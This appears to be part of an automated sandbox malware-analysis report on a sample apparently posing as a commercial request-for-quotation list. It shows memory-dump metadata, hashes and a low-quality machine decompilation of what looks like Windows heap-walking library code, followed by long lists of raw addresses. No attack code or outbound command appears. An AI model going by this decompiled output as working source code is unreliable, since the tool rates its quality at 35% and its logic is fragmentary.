                                                                                                                                                                                  control_flow_graph 5 33392c50-33392c5c LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 21ac445615a36dfa5621056ce28feec2438b55bc45ff74882da4ffdadfca1ef0
                                                                                                                                                                                  • Instruction ID: 31dc3409bbd2f699f48d7647e6337a7ff380ffd39292a1c5c755218f575bfd79
                                                                                                                                                                                  • Opcode Fuzzy Hash: 21ac445615a36dfa5621056ce28feec2438b55bc45ff74882da4ffdadfca1ef0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7990022571200403D544755C55186064509D7E1303F51D416E0404914CDD25885A6222
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 6 33392cf0-33392cfc LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 891c2bb720f88d41d2fae44611874e5a272df964414f8a2ff6b3480f5f41be4c
                                                                                                                                                                                  • Instruction ID: fb5200d0153bf7f7463b301635002751d882b4d2c5a7aa10fb7f03f4ed0deada
                                                                                                                                                                                  • Opcode Fuzzy Hash: 891c2bb720f88d41d2fae44611874e5a272df964414f8a2ff6b3480f5f41be4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 98900225653045525949B55C4504507450AD7E0243791C417A1404D10CC936985AE621
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 333F9060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 35%
                                                                                                                                                                                  			E333F9060(signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				short _v18;
				short _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void _v172;
				signed int _v176;
				signed int _v180;
				intOrPtr _v184;
				signed int _v188;
				short _v190;
				short _v192;
				signed int _v196;
				signed int _v198;
				signed int _v200;
				signed int _v204;
				signed int _v206;
				void _v208;
				signed int* _v212;
				signed int _v214;
				void* _v216;
				intOrPtr _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				char _v233;
				char _v236;
				signed int _v240;
				signed int _v241;
				intOrPtr* _v244;
				intOrPtr _v248;
				signed int _v249;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t299;
				signed int _t310;
				signed int _t315;
				signed int _t316;
				signed int _t321;
				signed int _t322;
				char* _t323;
				signed int _t325;
				signed int _t329;
				signed int _t333;
				signed int* _t334;
				signed int _t349;
				signed int _t352;
				signed int _t357;
				signed int _t367;
				signed int _t373;
				intOrPtr _t422;
				signed int _t423;
				signed int _t424;
				void* _t427;
				signed int _t429;
				signed int _t431;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr _t444;
				signed int _t448;
				signed int _t452;
				void _t458;
				signed int _t461;
				signed int _t464;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t471;
				signed int _t472;
				intOrPtr _t475;
				intOrPtr _t478;
				signed int _t480;
				intOrPtr* _t484;
				void* _t485;
				intOrPtr _t488;
				intOrPtr _t489;
				signed int _t492;
				signed int _t495;
				signed int _t496;
				signed int _t499;
				void* _t500;
				signed int _t501;
				signed int _t503;

				_t503 = (_t501 & 0xfffffff8) - 0xec;
				_v8 =  *0x3344b370 ^ _t503;
				_t299 = _a8;
				_t499 = _a4;
				_t434 = 0;
				_t482 =  *_t299;
				_t484 =  *((intOrPtr*)(_t299 + 4));
				_v204 = _t482;
				_v232 =  *((intOrPtr*)(_t299 + 8));
				_v228 = _t484;
				_v68 = 0;
				if( *((intOrPtr*)(_t499 + 8)) != 0xddeeddee) {
					__eflags =  *(_t499 + 0x44) & 0x01000000;
					_v233 = 0;
					_v212 = 0;
					if(( *(_t499 + 0x44) & 0x01000000) == 0) {
						goto L2;
					} else {
						_t310 = 0xc0000002;
						goto L98;
					}
				} else {
					_v233 = 1;
					_v212 = _t499;
					L2:
					if(_t482 != 0x80000000) {
						E33398F40( &_v156, _t434, 0x54);
						_t503 = _t503 + 0xc;
						_v172 = 2;
						_v168 = 0x20;
						_v164 = _t499;
						__eflags = _v233 - _t434;
						if(_v233 != _t434) {
							_t444 = _v212;
							_v160 = _t434;
							_v156 =  *(_t444 + 0x80) << 0xc;
							_v156 = _v156 + ( *(_t444 + 0x4c) << 0xc);
							_v152 =  *(_t444 + 0x84) << 0xc;
							_t81 =  &_v152;
							 *_t81 = _v152 + ( *(_t444 + 0x50) << 0xc);
							__eflags =  *_t81;
							_t310 = _t434;
						} else {
							_t482 =  &_v156;
							_v160 =  *(_t499 + 0xea) & 0x000000ff;
							_t310 = E333F98AA(_t499,  &_v156,  &_v152);
						}
						__eflags = _t310;
						if(_t310 < 0) {
							L98:
							_pop(_t485);
							_pop(_t500);
							_pop(_t435);
							return E33394B50(_t310, _t435, _v8 ^ _t503, _t482, _t485, _t500);
						} else {
							 *0x334491e0( &_v172, _v232);
							_t310 =  *_t484();
							__eflags = _t310;
							if(_t310 < 0) {
								goto L98;
							}
							_t482 = _v212;
							__eflags = _t482 - 3;
							if(_t482 < 3) {
								goto L98;
							}
							_v232 = _t434;
							__eflags = _t482 - 3;
							_v228 = _t434;
							_t448 = 7;
							_t315 = memset( &_v208, 0, _t448 << 2);
							_t503 = _t503 + 0xc;
							_t316 = _t315 & 0xffffff00 | __eflags > 0x00000000;
							_t488 = 0;
							__eflags = 0;
							_v224 = _t316;
							while(1) {
								_t482 =  &_v208;
								_t310 = E333FA388(_t499,  &_v208, _t316);
								__eflags = _t310 - 0x8000001a;
								if(_t310 == 0x8000001a) {
									break;
								}
								__eflags = _t310;
								if(_t310 < 0) {
									goto L98;
								}
								_t436 = _v198;
								__eflags = _t436 & 0x00000002;
								if((_t436 & 0x00000002) == 0) {
									__eflags = _t436 & 0x00004000;
									if((_t436 & 0x00004000) == 0) {
										__eflags = _t436 & 0x00001000;
										if((_t436 & 0x00001000) == 0) {
											__eflags = _v241;
											if(_v241 != 0) {
												L75:
												__eflags = _v212 - 4;
												_t316 = _v224;
												if(_v212 < 4) {
													continue;
												}
												L76:
												__eflags = _t436 & 0x000000f0;
												if((_t436 & 0x000000f0) == 0) {
													E33398F40( &_v180, _t488, 0x64);
													_t503 = _t503 + 0xc;
													_v172 = _v208;
													_v164 = _v204;
													_t321 = _v188;
													_v180 = 5;
													_v176 = 0x1c;
													__eflags = _t436 & 0x00000002;
													if((_t436 & 0x00000002) != 0) {
														_t321 = _v200 & 0x000000ff;
													}
													_v160 = _t321;
													__eflags = _t436 & 0x00000001;
													if((_t436 & 0x00000001) == 0) {
														_t322 = _v168;
													} else {
														_t322 = 1;
														_v168 = 1;
													}
													__eflags = _t436 & 0x00004000;
													if((_t436 & 0x00004000) == 0) {
														__eflags = _t436 & 0x00008000;
														if((_t436 & 0x00008000) == 0) {
															goto L94;
														}
														_t325 = _t322 | 0x00000008;
														__eflags = _t325;
														goto L93;
													} else {
														_t325 = _t322 | 0x00000004;
														L93:
														_v168 = _t325;
														L94:
														_t323 =  &_v180;
														L95:
														 *0x334491e0(_t323, _v240);
														_t310 =  *_v236();
														__eflags = _t310;
														if(_t310 < 0) {
															goto L98;
														}
														L96:
														_t316 = _v232;
														continue;
													}
												}
												_t452 = _v188;
												_v56 = _v208;
												_v48 = _v204;
												_t329 = 2;
												_v40 = _t488;
												_v36 = _t488;
												_v64 = 5;
												_v60 = 0x30;
												_v52 = _t329;
												__eflags = _t329 & _t436;
												if((_t329 & _t436) != 0) {
													_t452 = _v200 & 0x000000ff;
												}
												_v44 = _t452;
												__eflags = _t436 & 0x00004000;
												if((_t436 & 0x00004000) != 0) {
													_t329 = 6;
													_v52 = _t329;
												}
												__eflags = _t436 & 0x00000001;
												if((_t436 & 0x00000001) != 0) {
													_t333 = _t329 | 0x00000001;
													__eflags = _t333;
													_v52 = _t333;
												}
												_v24 = _v196;
												_v20 = _v192;
												_v18 = _v190;
												_t323 =  &_v64;
												_v32 = 1;
												_v28 = 0x14;
												goto L95;
											}
											_t334 = _v208;
											__eflags = _t334 - _v232;
											if(_t334 < _v232) {
												L72:
												_t482 = _t334;
												E333F8093(_v76, _t334,  &_v232,  &_v228,  &_v68,  &_v216);
												__eflags = _v228 - 4;
												if(_v228 < 4) {
													goto L96;
												}
												E33398F40( &_v180, _t488, 0x64);
												_t458 = _v232;
												_t503 = _t503 + 0xc;
												_v168 = _v228 - _t458;
												_v160 = _v216;
												_v172 = _t458;
												_v180 = 4;
												_v176 = 0x20;
												_v164 = 1;
												 *0x334491e0( &_v180, _v240);
												_t310 =  *_v236();
												__eflags = _t310;
												if(_t310 < 0) {
													goto L98;
												}
												_t436 = _v206;
												goto L75;
											}
											__eflags = _t334 - _v228;
											if(_t334 <= _v228) {
												goto L75;
											}
											goto L72;
										}
										__eflags = _v212 - 4;
										_t316 = _v224;
										if(_v212 < 4) {
											continue;
										}
										E33398F40( &_v180, _t488, 0x64);
										_t503 = _t503 + 0xc;
										_v172 = _v208;
										_t325 = _v204;
										_v180 = 4;
										_v176 = 0x20;
										_v164 = 2;
										_v160 = 1;
										goto L93;
									}
									E33398F40( &_v172, 0, 0x5c);
									_t503 = _t503 + 0xc;
									_v180 = 3;
									_t496 = 0;
									_v176 = 0x1c;
									_v72 = 0;
									__eflags = _v241;
									if(_v241 != 0) {
										_t482 = _v208;
										_t349 = _v220 + 0x44;
										_v172 = _t482;
										__eflags =  *(_t349 + 4) & 0x00000001;
										_t496 =  *_t349;
										if(( *(_t349 + 4) & 0x00000001) != 0) {
											__eflags = _t496;
											if(_t496 == 0) {
												_t496 = 0;
											} else {
												_t496 = _t496 ^ _t349;
											}
										}
										_t461 =  *(_t349 + 4) & 1;
										while(1) {
											__eflags = _t496;
											if(_t496 == 0) {
												break;
											}
											__eflags = _t482 - ( *(_t496 + 0xc) & 0xffff0000);
											if(__eflags < 0) {
												_t352 =  *_t496;
												L54:
												__eflags = _t461;
												if(_t461 == 0) {
													L57:
													_t496 = _t352;
													continue;
												}
												__eflags = _t352;
												if(_t352 == 0) {
													goto L57;
												}
												_t496 = _t496 ^ _t352;
												continue;
											}
											if(__eflags <= 0) {
												break;
											}
											_t352 =  *(_t496 + 4);
											goto L54;
										}
										_v168 = ( *(_t496 + 0x10) & 0xfffff000) + 0x1000;
										_t357 =  *(_t496 + 0x10) & 0xfffff000;
										__eflags = _t357;
										L60:
										_v164 = _t357;
										 *0x334491e0( &_v180, _v240);
										_t310 = _v236();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										}
										E33398F40( &_v176, 0, 0x58);
										_t503 = _t503 + 0xc;
										_v184 = 0x20;
										_t464 = 4;
										_v188 = _t464;
										__eflags = _v249;
										if(_v249 != 0) {
											_v180 = _v216;
											_v176 =  *(_t496 + 0x10) & 0xfffff000;
											_t367 =  *(_v228 + 0xc) & 0x40000000;
											__eflags = _t367;
										} else {
											_t373 = _v80;
											_v180 = _t373;
											_v176 =  *((intOrPtr*)(_t373 + 0x10));
											_t367 =  *(_t499 + 0x40) & 0x00040000;
										}
										_v172 = 1;
										asm("sbb eax, eax");
										_v168 = ( ~_t367 & 0x0000003c) + _t464;
										 *0x334491e0( &_v188, _v248);
										_t310 =  *_v244();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										} else {
											_t436 = _v214;
											_t488 = 0;
											goto L76;
										}
									}
									_t467 = _v208 + 0xfffffff8;
									__eflags =  *((char*)(_t467 + 7)) - 5;
									if( *((char*)(_t467 + 7)) == 5) {
										_t467 = _t467 - (( *(_t467 + 6) & 0x000000ff) << 3);
										__eflags = _t467;
									}
									_t468 = _t467 + 0xffffffe8;
									_v72 = _t468;
									_v172 = _t468 & 0xffff0000;
									_v168 =  *((intOrPtr*)(_t468 + 0x14));
									_t357 =  *(_t468 + 0x10);
									goto L60;
								}
								__eflags = _v241;
								if(_v241 != 0) {
									L30:
									_t489 = _v208;
									L31:
									E33398F40( &_v160, 0, 0x50);
									_t469 = _v196;
									_t503 = _t503 + 0xc;
									_v172 = _t489;
									_v168 = _v192 + _t469;
									_v164 = _t469;
									_v180 = 3;
									_v176 = 0x1c;
									 *0x334491e0( &_v180, _v240);
									_t310 =  *_v236();
									__eflags = _t310;
									if(_t310 < 0) {
										goto L98;
									}
									__eflags = _v249;
									if(_v249 != 0) {
										_t471 = _v216;
										_v236 = _v204 + _t471;
										_t492 =  *(_v228 + 0xc) & 0x40000000;
										__eflags = _t492;
										L37:
										_v240 = _t471;
										asm("sbb edi, edi");
										_t495 = ( ~_t492 & 0x0000003c) + 4;
										__eflags = _t495;
										_v224 = _t495;
										L38:
										E33398F40( &_v188, 0, 0x64);
										_t472 = _v240;
										_t503 = _t503 + 0xc;
										_v176 = _v236 - _t472;
										_v180 = _t472;
										_v188 = 4;
										_v184 = 0x20;
										_v172 = 1;
										_v168 = _t495;
										 *0x334491e0( &_v188, _v248);
										_t310 =  *_v244();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										}
										_t488 = 0;
										goto L96;
									}
									__eflags = _v206 & 0x00008000;
									if((_v206 & 0x00008000) != 0) {
										_t471 = _v216;
										_v236 = _v204 + _t471;
										_t492 =  *(_t499 + 0x40) & 0x00040000;
										goto L37;
									}
									_t482 = _v84;
									E333F8093(_v84, _v84,  &_v240,  &_v236,  &_v76,  &_v224);
									_t495 = _v240;
									goto L38;
								}
								__eflags = _t436 & 0x00008000;
								if((_t436 & 0x00008000) != 0) {
									goto L30;
								}
								_t475 = _v208;
								_v76 = _t475;
								__eflags = _t475 + 0x10 -  *((intOrPtr*)(_t499 + 0xa4));
								if(_t475 + 0x10 !=  *((intOrPtr*)(_t499 + 0xa4))) {
									_t489 = _t475;
								} else {
									_t489 = _t499;
								}
								goto L31;
							}
							_t310 = 0;
							__eflags = 0;
							goto L98;
						}
					}
					E33398F40( &_v164, _t434, 0x5c);
					_t503 = _t503 + 0xc;
					_v172 = 0x80000000;
					_v168 = 0x64;
					if(_v233 == _t434) {
						_v156 =  *(_t499 + 0x7c) & 0x0000ffff;
						_v160 = 1;
						_v148 = _t499;
						_v152 =  *((intOrPtr*)( *[fs:0x30] + 0x88)) - 1;
						_v144 =  *((intOrPtr*)(_t499 + 0x1f4));
						_v140 =  *((intOrPtr*)(_t499 + 0x1f8)) -  *((intOrPtr*)(_t499 + 0x244));
						_v124 = E333FD7E5(_t499);
						_v120 =  *(_t499 + 0x74) << 3;
						_v128 =  *((intOrPtr*)(_t499 + 0x208));
						_v108 =  *((intOrPtr*)(_t499 + 0x200));
						_v132 =  *((intOrPtr*)(_t499 + 0x1fc));
						_v136 =  *((intOrPtr*)(_t499 + 0x204));
						_t422 =  *((intOrPtr*)(_t499 + 0x20c));
						_v104 = _t422;
						_v100 = _t422;
						_t423 =  *(_t499 + 0xb4);
						__eflags = _t423;
						if(_t423 != 0) {
							_t480 =  *((intOrPtr*)(_t423 + 0xc));
							_v116 = _t480;
							_t429 =  *_t423;
							__eflags = _t429;
							if(_t429 != 0) {
								_t431 =  *((intOrPtr*)(_t429 + 0xc)) + _t480;
								__eflags = _t431;
								_v116 = _t431;
							}
						}
						_t424 =  *(_t499 + 0xc8);
						_t478 =  *((intOrPtr*)(_t499 + 0x218));
						_v112 = _t478;
						__eflags = _t424;
						if(_t424 != 0) {
							_t427 =  *_t424;
							__eflags = _t427 - 0xffffffff;
							if(_t427 != 0xffffffff) {
								_t434 =  *(_t427 + 0x14);
							}
							_v112 = _t478 + _t434;
						}
					} else {
						_t482 =  &_v172;
						E334192AB(_v212,  &_v172);
					}
					 *0x334491e0( &_v172, _v232);
					_t310 =  *_t484();
					goto L98;
				}
			}
























































































































                                                                                                                                                                                  0x333f9068
                                                                                                                                                                                  0x333f9075
                                                                                                                                                                                  0x333f907c
                                                                                                                                                                                  0x333f9081
                                                                                                                                                                                  0x333f9084
                                                                                                                                                                                  0x333f9086
                                                                                                                                                                                  0x333f9093
                                                                                                                                                                                  0x333f9096
                                                                                                                                                                                  0x333f909a
                                                                                                                                                                                  0x333f909e
                                                                                                                                                                                  0x333f90a2
                                                                                                                                                                                  0x333f90a9
                                                                                                                                                                                  0x333f90f8
                                                                                                                                                                                  0x333f90ff
                                                                                                                                                                                  0x333f9103
                                                                                                                                                                                  0x333f9107
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9109
                                                                                                                                                                                  0x333f9109
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9109
                                                                                                                                                                                  0x333f90ab
                                                                                                                                                                                  0x333f90ab
                                                                                                                                                                                  0x333f90b0
                                                                                                                                                                                  0x333f90b4
                                                                                                                                                                                  0x333f90ba
                                                                                                                                                                                  0x333f921d
                                                                                                                                                                                  0x333f9222
                                                                                                                                                                                  0x333f9225
                                                                                                                                                                                  0x333f922d
                                                                                                                                                                                  0x333f9235
                                                                                                                                                                                  0x333f9239
                                                                                                                                                                                  0x333f923d
                                                                                                                                                                                  0x333f925c
                                                                                                                                                                                  0x333f9260
                                                                                                                                                                                  0x333f926d
                                                                                                                                                                                  0x333f9277
                                                                                                                                                                                  0x333f9284
                                                                                                                                                                                  0x333f928e
                                                                                                                                                                                  0x333f928e
                                                                                                                                                                                  0x333f928e
                                                                                                                                                                                  0x333f9292
                                                                                                                                                                                  0x333f923f
                                                                                                                                                                                  0x333f9246
                                                                                                                                                                                  0x333f924a
                                                                                                                                                                                  0x333f9255
                                                                                                                                                                                  0x333f9255
                                                                                                                                                                                  0x333f9294
                                                                                                                                                                                  0x333f9296
                                                                                                                                                                                  0x333f9893
                                                                                                                                                                                  0x333f989a
                                                                                                                                                                                  0x333f989b
                                                                                                                                                                                  0x333f989c
                                                                                                                                                                                  0x333f98a7
                                                                                                                                                                                  0x333f929c
                                                                                                                                                                                  0x333f92a7
                                                                                                                                                                                  0x333f92ad
                                                                                                                                                                                  0x333f92af
                                                                                                                                                                                  0x333f92b1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f92b7
                                                                                                                                                                                  0x333f92bb
                                                                                                                                                                                  0x333f92be
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f92c6
                                                                                                                                                                                  0x333f92cc
                                                                                                                                                                                  0x333f92cf
                                                                                                                                                                                  0x333f92d3
                                                                                                                                                                                  0x333f92d8
                                                                                                                                                                                  0x333f92d8
                                                                                                                                                                                  0x333f92da
                                                                                                                                                                                  0x333f92dd
                                                                                                                                                                                  0x333f92dd
                                                                                                                                                                                  0x333f92df
                                                                                                                                                                                  0x333f92e3
                                                                                                                                                                                  0x333f92e4
                                                                                                                                                                                  0x333f92ea
                                                                                                                                                                                  0x333f92ef
                                                                                                                                                                                  0x333f92f4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f92fa
                                                                                                                                                                                  0x333f92fc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9302
                                                                                                                                                                                  0x333f9306
                                                                                                                                                                                  0x333f9309
                                                                                                                                                                                  0x333f947c
                                                                                                                                                                                  0x333f9482
                                                                                                                                                                                  0x333f961c
                                                                                                                                                                                  0x333f9622
                                                                                                                                                                                  0x333f9674
                                                                                                                                                                                  0x333f9679
                                                                                                                                                                                  0x333f9728
                                                                                                                                                                                  0x333f9728
                                                                                                                                                                                  0x333f972d
                                                                                                                                                                                  0x333f9731
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9737
                                                                                                                                                                                  0x333f9737
                                                                                                                                                                                  0x333f973a
                                                                                                                                                                                  0x333f9805
                                                                                                                                                                                  0x333f980e
                                                                                                                                                                                  0x333f9811
                                                                                                                                                                                  0x333f9819
                                                                                                                                                                                  0x333f981d
                                                                                                                                                                                  0x333f9821
                                                                                                                                                                                  0x333f9829
                                                                                                                                                                                  0x333f9831
                                                                                                                                                                                  0x333f9834
                                                                                                                                                                                  0x333f9836
                                                                                                                                                                                  0x333f9836
                                                                                                                                                                                  0x333f983b
                                                                                                                                                                                  0x333f983f
                                                                                                                                                                                  0x333f9842
                                                                                                                                                                                  0x333f984d
                                                                                                                                                                                  0x333f9844
                                                                                                                                                                                  0x333f9846
                                                                                                                                                                                  0x333f9847
                                                                                                                                                                                  0x333f9847
                                                                                                                                                                                  0x333f9851
                                                                                                                                                                                  0x333f9857
                                                                                                                                                                                  0x333f985e
                                                                                                                                                                                  0x333f9864
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9866
                                                                                                                                                                                  0x333f9866
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9859
                                                                                                                                                                                  0x333f9859
                                                                                                                                                                                  0x333f9869
                                                                                                                                                                                  0x333f9869
                                                                                                                                                                                  0x333f986d
                                                                                                                                                                                  0x333f986d
                                                                                                                                                                                  0x333f9871
                                                                                                                                                                                  0x333f987c
                                                                                                                                                                                  0x333f9882
                                                                                                                                                                                  0x333f9884
                                                                                                                                                                                  0x333f9886
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9888
                                                                                                                                                                                  0x333f9888
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9888
                                                                                                                                                                                  0x333f9857
                                                                                                                                                                                  0x333f9744
                                                                                                                                                                                  0x333f9748
                                                                                                                                                                                  0x333f9755
                                                                                                                                                                                  0x333f975c
                                                                                                                                                                                  0x333f975d
                                                                                                                                                                                  0x333f9764
                                                                                                                                                                                  0x333f976b
                                                                                                                                                                                  0x333f9776
                                                                                                                                                                                  0x333f9781
                                                                                                                                                                                  0x333f9788
                                                                                                                                                                                  0x333f978a
                                                                                                                                                                                  0x333f978c
                                                                                                                                                                                  0x333f978c
                                                                                                                                                                                  0x333f9791
                                                                                                                                                                                  0x333f9798
                                                                                                                                                                                  0x333f979e
                                                                                                                                                                                  0x333f97a2
                                                                                                                                                                                  0x333f97a3
                                                                                                                                                                                  0x333f97a3
                                                                                                                                                                                  0x333f97aa
                                                                                                                                                                                  0x333f97ad
                                                                                                                                                                                  0x333f97af
                                                                                                                                                                                  0x333f97af
                                                                                                                                                                                  0x333f97b2
                                                                                                                                                                                  0x333f97b2
                                                                                                                                                                                  0x333f97bd
                                                                                                                                                                                  0x333f97c9
                                                                                                                                                                                  0x333f97d6
                                                                                                                                                                                  0x333f97de
                                                                                                                                                                                  0x333f97e5
                                                                                                                                                                                  0x333f97f0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f97f0
                                                                                                                                                                                  0x333f967f
                                                                                                                                                                                  0x333f9683
                                                                                                                                                                                  0x333f9687
                                                                                                                                                                                  0x333f9693
                                                                                                                                                                                  0x333f9697
                                                                                                                                                                                  0x333f96b3
                                                                                                                                                                                  0x333f96b8
                                                                                                                                                                                  0x333f96bd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f96cb
                                                                                                                                                                                  0x333f96d0
                                                                                                                                                                                  0x333f96d4
                                                                                                                                                                                  0x333f96e1
                                                                                                                                                                                  0x333f96ed
                                                                                                                                                                                  0x333f96f5
                                                                                                                                                                                  0x333f96fc
                                                                                                                                                                                  0x333f9704
                                                                                                                                                                                  0x333f970c
                                                                                                                                                                                  0x333f9714
                                                                                                                                                                                  0x333f971a
                                                                                                                                                                                  0x333f971c
                                                                                                                                                                                  0x333f971e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9724
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9724
                                                                                                                                                                                  0x333f9689
                                                                                                                                                                                  0x333f968d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f968d
                                                                                                                                                                                  0x333f9624
                                                                                                                                                                                  0x333f9629
                                                                                                                                                                                  0x333f962d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f963b
                                                                                                                                                                                  0x333f9644
                                                                                                                                                                                  0x333f9647
                                                                                                                                                                                  0x333f964b
                                                                                                                                                                                  0x333f964f
                                                                                                                                                                                  0x333f9657
                                                                                                                                                                                  0x333f965f
                                                                                                                                                                                  0x333f9667
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9667
                                                                                                                                                                                  0x333f9492
                                                                                                                                                                                  0x333f9497
                                                                                                                                                                                  0x333f949a
                                                                                                                                                                                  0x333f94a2
                                                                                                                                                                                  0x333f94a4
                                                                                                                                                                                  0x333f94ac
                                                                                                                                                                                  0x333f94b3
                                                                                                                                                                                  0x333f94b7
                                                                                                                                                                                  0x333f94f4
                                                                                                                                                                                  0x333f94f8
                                                                                                                                                                                  0x333f94fb
                                                                                                                                                                                  0x333f94ff
                                                                                                                                                                                  0x333f9503
                                                                                                                                                                                  0x333f9505
                                                                                                                                                                                  0x333f9507
                                                                                                                                                                                  0x333f9509
                                                                                                                                                                                  0x333f950f
                                                                                                                                                                                  0x333f950b
                                                                                                                                                                                  0x333f950b
                                                                                                                                                                                  0x333f950b
                                                                                                                                                                                  0x333f9509
                                                                                                                                                                                  0x333f9515
                                                                                                                                                                                  0x333f953d
                                                                                                                                                                                  0x333f953d
                                                                                                                                                                                  0x333f953f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9522
                                                                                                                                                                                  0x333f9524
                                                                                                                                                                                  0x333f952d
                                                                                                                                                                                  0x333f952f
                                                                                                                                                                                  0x333f952f
                                                                                                                                                                                  0x333f9531
                                                                                                                                                                                  0x333f953b
                                                                                                                                                                                  0x333f953b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f953b
                                                                                                                                                                                  0x333f9533
                                                                                                                                                                                  0x333f9535
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9537
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9537
                                                                                                                                                                                  0x333f9526
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9528
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9528
                                                                                                                                                                                  0x333f9550
                                                                                                                                                                                  0x333f9557
                                                                                                                                                                                  0x333f9557
                                                                                                                                                                                  0x333f9559
                                                                                                                                                                                  0x333f9561
                                                                                                                                                                                  0x333f956a
                                                                                                                                                                                  0x333f9570
                                                                                                                                                                                  0x333f9574
                                                                                                                                                                                  0x333f9576
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9584
                                                                                                                                                                                  0x333f9589
                                                                                                                                                                                  0x333f958c
                                                                                                                                                                                  0x333f9596
                                                                                                                                                                                  0x333f9597
                                                                                                                                                                                  0x333f959b
                                                                                                                                                                                  0x333f959f
                                                                                                                                                                                  0x333f95c1
                                                                                                                                                                                  0x333f95cd
                                                                                                                                                                                  0x333f95d8
